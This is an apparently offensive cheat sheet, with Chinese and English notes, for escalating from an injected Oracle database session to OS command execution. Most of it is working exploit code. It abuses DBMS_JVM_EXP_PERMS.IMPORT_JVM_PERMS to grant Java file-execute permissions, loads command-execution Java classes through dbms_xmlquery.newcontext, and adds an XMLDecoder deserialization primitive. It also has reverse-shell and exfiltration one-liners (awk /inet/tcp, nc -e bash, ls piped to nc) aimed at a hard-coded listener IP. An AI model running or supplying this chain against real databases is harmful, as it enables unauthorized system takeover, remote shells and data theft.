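-- Recon queries to run from the injected / stolen Oracle session before trying any of
-- the escalation paths below. All are read-only.

-- Oracle version: decides which Java-based path applies (10g vs 11g differ below).
select * from v$version;

-- Is the current session already running as a DBA?
select userenv('ISDBA') from dual;

-- Roles granted directly to the current user.
select * from user_role_privs;

-- Effective system privileges of this session. This is the authoritative answer to
-- "do I have CREATE SESSION / CREATE PROCEDURE", because it already resolves roles.
select * from session_privs;

-- Alternative view of the same: privileges reachable through roles plus direct grants.
select * from role_sys_privs
union
select * from user_sys_privs;

-- Which accounts hold the DBA role (needs DBA / SELECT on the DBA_* views).
select * from dba_role_privs where granted_role='DBA';

-- Roles held by a given user (needs DBA).
select granted_role from dba_role_privs where grantee='SYSTEM';

-- System privileges of a given user (needs DBA). The original query only listed
-- privileges inherited through roles and silently missed privileges granted to the
-- user directly, so the direct grants are included here. Roles granted to roles are
-- still not expanded -- check those separately if the picture looks incomplete.
select privilege from dba_sys_privs
where grantee='SYSTEM'
   or grantee in (select granted_role from dba_role_privs where grantee='SYSTEM');

-- Fuller reference list: https://www.cnblogs.com/qlqwjy/p/8404959.html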
-- Step 1 (no CREATE PROCEDURE needed): grant the current schema
-- java.io.FilePermission <<ALL FILES>> execute by feeding a one-row policy table to
-- DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS. This works on unpatched 10gR2/11gR1 instances
-- where that package is callable by a low-privileged user without a privilege check;
-- later CPUs restrict it, so failure here usually means the instance is patched.
-- The resulting grant is persisted in the Java policy table (visible in
-- user_java_policy / dba_java_policy) and can be undone with
-- DBMS_JAVA.REVOKE_PERMISSION -- remove it when the engagement is over.
DECLARE
    perms DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;
    -- Columns: action, grantee, permission schema, permission class, target,
    -- action list, status -- one row per grant.
    CURSOR grant_row IS
        SELECT 'GRANT', USER(), 'SYS', 'java.io.FilePermission',
               '<<ALL FILES>>', 'execute', 'ENABLED'
        FROM DUAL;
BEGIN
    OPEN grant_row;
    FETCH grant_row BULK COLLECT INTO perms;
    CLOSE grant_row;
    DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(perms);
END;
/
Step2:RCE
-- 11g: DBMS_JAVA.RUNJAVA runs a Java class's main(); oracle/aurora/util/Wrapper is an
-- Oracle-shipped helper that passes the remaining tokens to Runtime.exec (see below).
-- The IP:port is the author's listener -- replace with your own. If a bare "curl" is
-- not found, give its full path as the later examples do, since no shell resolves it.
select dbms_java.runjava('oracle/aurora/util/Wrapper curl 139.199.203.253:1234') from dual;
-- 10g/11g: 10g has no DBMS_JAVA.RUNJAVA, so DBMS_JAVA_TEST.FUNCALL(class, method, args...)
-- is used instead; it also works on 11g. On 10g the caller additionally needs
-- java.lang.RuntimePermission granted first, otherwise the call is refused.
-- Each value after 'main' apparently becomes one argv element for Runtime.exec, which is
-- why the pipeline is wrapped in an explicit "/usr/bin/bash -c" -- Runtime.exec itself
-- does not interpret the "|".
select dbms_java_test.funcall('oracle/aurora/util/Wrapper', 'main', '/usr/bin/bash', '-c', '/bin/ls|/usr/bin/nc 139.199.203.253 1234') from dual;
-- The Wrapper class hands its arguments to Runtime.exec, which starts the binary directly
-- without a shell: $VAR, backticks, pipes and redirections are NOT interpreted, so
-- binaries need full paths (/bin/ls). That is most likely also why the classic
-- "bash -i >& /dev/tcp/HOST/PORT 0>&1" does not work here -- the redirections reach
-- bash as literal arguments -- and many targets have no /dev/tcp anyway.
-- The IP:port in all three is the author's listener; replace with your own.

-- Option 1: awk with its built-in /inet/tcp sockets -- no shell needed on the way in.
select dbms_java.runjava('oracle/aurora/util/Wrapper awk "BEGIN{s=\"/inet/tcp/0/139.199.203.253/1234\";for(;s|&getline c;close(c))while(c|getline)print|&s;close(s)}"') from dual;

-- Option 2: netcat with -e. Only traditional netcat / ncat builds support -e;
-- the OpenBSD nc shipped by many distributions does not.
select dbms_java.runjava('oracle/aurora/util/Wrapper nc -e /usr/bin/bash 139.199.203.253 1234') from dual;

-- Option 3: out-of-band exfiltration of one command's output. Here bash -c is the shell,
-- so the pipe inside the quoted string IS honoured.
select dbms_java.runjava('oracle/aurora/util/Wrapper /usr/bin/bash -c "/bin/ls|/usr/bin/nc 139.199.203.253 1234"') from dual;
dbms_xmlquery实现任意代码执行
DBMS_EXPORT_EXTENSION也可以,大同小异而且影响版本相同,这里只写这一个
Step1: 创建java代码执行包
-- Step 1 (no CREATE PROCEDURE on the caller): load a Java class into the schema via
-- dbms_xmlquery.newcontext, which evaluates the PL/SQL block handed to it, so a plain
-- SELECT ends up running DDL. PRAGMA AUTONOMOUS_TRANSACTION lets that DDL commit
-- independently of the calling statement.
-- Quoting: '' is one single quote inside the outer literal, so the EXECUTE IMMEDIATE
-- string is everything between ''create ... '' .
-- The Java class LinxUtil.runCMD(String) passes its argument straight to Runtime.exec,
-- reads ONLY stdout line by line (stderr is dropped, so a failing command comes back as
-- an empty string), joins lines with "\n" and returns the exception text on error.
-- "LinxUtil" is a persistent schema object -- drop it when done: drop java source "LinxUtil";
select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}}'';commit;end;') from dual;
-- Step 2: Java permissions the RCE function needs, pushed in through
-- DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS (callable without DBA rights on unpatched instances).
-- Each grant lands in the Java policy table (user_java_policy / dba_java_policy) and
-- survives the session; revoke with DBMS_JAVA.REVOKE_PERMISSION afterwards.

-- 1) java.io.FilePermission <<ALL FILES>> execute: allows Runtime.exec to start any binary.
DECLARE
    grants DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;
    CURSOR file_exec IS
        SELECT 'GRANT', USER(), 'SYS', 'java.io.FilePermission', '<<ALL FILES>>', 'execute', 'ENABLED'
        FROM DUAL;
BEGIN
    OPEN file_exec;
    FETCH file_exec BULK COLLECT INTO grants;
    CLOSE file_exec;
    DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(grants);
END;
/

-- 2) java.lang.RuntimePermission writeFileDescriptor -- presumably needed for the child
--    process's stdin/stdout descriptors; 10g refuses the call without it (see the
--    DBMS_JAVA_TEST note above). No action list, hence NULL.
DECLARE
    grants DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;
    CURSOR fd_write IS
        SELECT 'GRANT', USER(), 'SYS', 'java.lang.RuntimePermission', 'writeFileDescriptor', NULL, 'ENABLED'
        FROM DUAL;
BEGIN
    OPEN fd_write;
    FETCH fd_write BULK COLLECT INTO grants;
    CLOSE fd_write;
    DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(grants);
END;
/

-- 3) java.lang.RuntimePermission readFileDescriptor -- counterpart of 2).
DECLARE
    grants DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;
    CURSOR fd_read IS
        SELECT 'GRANT', USER(), 'SYS', 'java.lang.RuntimePermission', 'readFileDescriptor', NULL, 'ENABLED'
        FROM DUAL;
BEGIN
    OPEN fd_read;
    FETCH fd_read BULK COLLECT INTO grants;
    CLOSE fd_read;
    DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(grants);
END;
/
Step3:获得RCE函数
-- Step 3: create the PL/SQL call specification that maps a SQL function onto the Java
-- method loaded in step 1, again smuggled in through dbms_xmlquery.newcontext with an
-- autonomous transaction so the DDL can run from inside a SELECT.
-- Quote levels: '' is one quote inside the outer literal; '''' is one quote inside the
-- nested EXECUTE IMMEDIATE string (the Java name must be quoted in the call spec).
-- Result: LinxRunCMD(p_cmd) -> LinxUtil.runCMD(java.lang.String); p_cmd goes straight
-- to Runtime.exec. LinxRunCMD is a persistent object -- drop function LinxRunCMD; when done.
select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''create or replace function LinxRunCMD(p_cmd in varchar2) return varchar2 as language java name ''''LinxUtil.runCMD(java.lang.String) return String''''; '';commit;end;') from dual;
Step4:RCE
-- Step 4: run a command. The argument is handed to Runtime.exec unchanged (no shell, so
-- no pipes/redirections here; wrap in /bin/sh -c if you need them). Unquoted identifiers
-- are case-insensitive in Oracle, so the spelling of the function name does not matter.
-- Cleanup afterwards -- both objects persist in the schema:
--   drop function LinxRunCMD;
--   drop java source "LinxUtil";
select linxruncmd('whoami') from dual;
有CREATE PROCEDURE权限
10/11g
有create procedure直接创建存储过程一把梭就好。
Step1:获得FilePermission权限
-- Step 1 (CREATE PROCEDURE path): the Java class created next still needs
-- java.io.FilePermission <<ALL FILES>> execute before Runtime.exec is allowed to start
-- anything (this is exactly the AccessControlException shown in Q2 at the bottom).
-- IMPORT_JVM_PERMS is used because a low-privileged user normally cannot call
-- dbms_java.grant_permission on itself. The grant persists in the Java policy table;
-- revoke it with DBMS_JAVA.REVOKE_PERMISSION after the engagement.
DECLARE
    policy_rows DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;
    CURSOR one_grant IS
        SELECT 'GRANT',
               USER(),
               'SYS',
               'java.io.FilePermission',
               '<<ALL FILES>>',
               'execute',
               'ENABLED'
        FROM DUAL;
BEGIN
    OPEN one_grant;
    FETCH one_grant BULK COLLECT INTO policy_rows;
    CLOSE one_grant;
    DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(policy_rows);
END;
/
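-- Step 2 (CREATE PROCEDURE path): load a Java class into the schema and expose it as the
-- SQL function javae(p_command). Requires CREATE PROCEDURE plus the FilePermission grant
-- above. Both "oraexec" and javae persist -- drop them when done:
--   drop function javae;  drop java source "oraexec";
create or replace and resolve java source named "oraexec" as
import java.lang.*;
import java.io.*;

/**
 * Runs an OS command with Runtime.exec (no shell: no pipes, redirections or PATH
 * lookup guarantees -- give full paths) and returns its stdout as a String.
 * stderr is not read, so a failing command comes back as an empty string.
 * On any exception the exception message is returned instead of propagating.
 * NOTE(review): very long output will exceed what a SQL VARCHAR2 can carry -- confirm
 * the limit on the target version before relying on big results.
 */
public class oraexec {
    public static String execCommand(String command) throws IOException, InterruptedException {
        Runtime rt = Runtime.getRuntime();
        int bufSize = 4096;
        byte buffer[] = new byte[bufSize];
        StringBuilder rc = new StringBuilder();
        int len;
        try {
            Process p = rt.exec(command);
            BufferedInputStream bis = new BufferedInputStream(p.getInputStream(), bufSize);
            while ((len = bis.read(buffer, 0, bufSize)) != -1) {
                // Decode only the bytes this read returned. The original decoded the whole
                // 4 KiB buffer and split on NUL, which re-emitted stale bytes left over from
                // earlier, longer reads and duplicated output. (A multi-byte character split
                // across two reads is still decoded wrongly -- same as before.)
                rc.append(new String(buffer, 0, len));
            }
            bis.close();
            p.waitFor();
            return rc.toString();
        } catch (Exception e) {
            // Keep the original contract: report the error text rather than throwing.
            // (The original did this via a return inside finally, which also swallowed
            // any exception thrown in the catch path.)
            return e.getMessage();
        }
    }
}
/
-- PL/SQL call specification: javae('cmd') -> oraexec.execCommand(cmd).
create or replace function javae(p_command in varchar2) return varchar2
    as language java name 'oraexec.execCommand(java.lang.String) return String';
/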
-- Alternative RCE primitive: a procedure that feeds caller-supplied XML to
-- java.beans.XMLDecoder. readObject() instantiates the classes the document names and
-- calls the methods it lists, so whoever controls p_xml controls what runs (e.g. a
-- java.lang.ProcessBuilder element). Needs CREATE PROCEDURE plus the Java permissions
-- for whatever the XML ends up doing. Both DECODE (java source) and decodeme persist --
-- drop them when done.
create or replace and compile java source named Decode as
import java.io.*;
import java.beans.*;

/** Deserialises (and thereby executes) a java.beans XML document. */
public class Decode {
    public static void input(String xml) throws InterruptedException, IOException {
        // xml.getBytes() uses the JVM default charset -- fine for ASCII payloads;
        // NOTE(review): confirm encoding if the payload carries non-ASCII text.
        ByteArrayInputStream payload = new ByteArrayInputStream(xml.getBytes());
        XMLDecoder decoder = new XMLDecoder(payload);
        // The return value is irrelevant; the side effects of decoding are the point.
        decoder.readObject();
    }
};
/
-- Call specification: decodeme(xml) -> Decode.input(xml).
CREATE OR REPLACE PROCEDURE decodeme (p_xml IN VARCHAR2) IS
    language java name 'Decode.input(java.lang.String)';
/
Q1: ORA-29516: Aurora assertion failure: Assertion failure at joez.c:3311 Bulk load of method java/lang/Object.<init> failed; insufficient shm-object space S1: 关闭JIT: alter system set JAVA_JIT_ENABLED=FALSE scope=both; (注意: alter system 需要 ALTER SYSTEM 系统权限,低权限注入场景下一般执行不了;scope=both 还会写入 spfile,是影响整个实例、重启后仍生效的持久化改动,DBA很容易察觉。)
Q2: Java call terminated by uncaught Java exception: java.security.AccessControlException: the Permission (java.io.FilePermission <<ALL FILES>> execute) has not been granted to SCOTT. The PL/SQL to grant this is dbms_java.grant_permission( 'SCOTT', 'SYS:java.io.FilePermission', '<<ALL FILES>>', 'execute' ) S2: 无FilePermission,使用上面添加FilePermission的语句加一下即可。查看用户Java权限加上了没: select * from user_java_policy where grantee_name='SCOTT'; user_java_policy 只能看到当前用户自己的授权,要查其他用户需要 dba_java_policy(需要DBA)。报错里给出的 dbms_java.grant_permission 一般要求授权者本身具备Java管理权限,低权限用户通常调不了,所以才要走 DBMS_JVM_EXP_PERMS 这条路。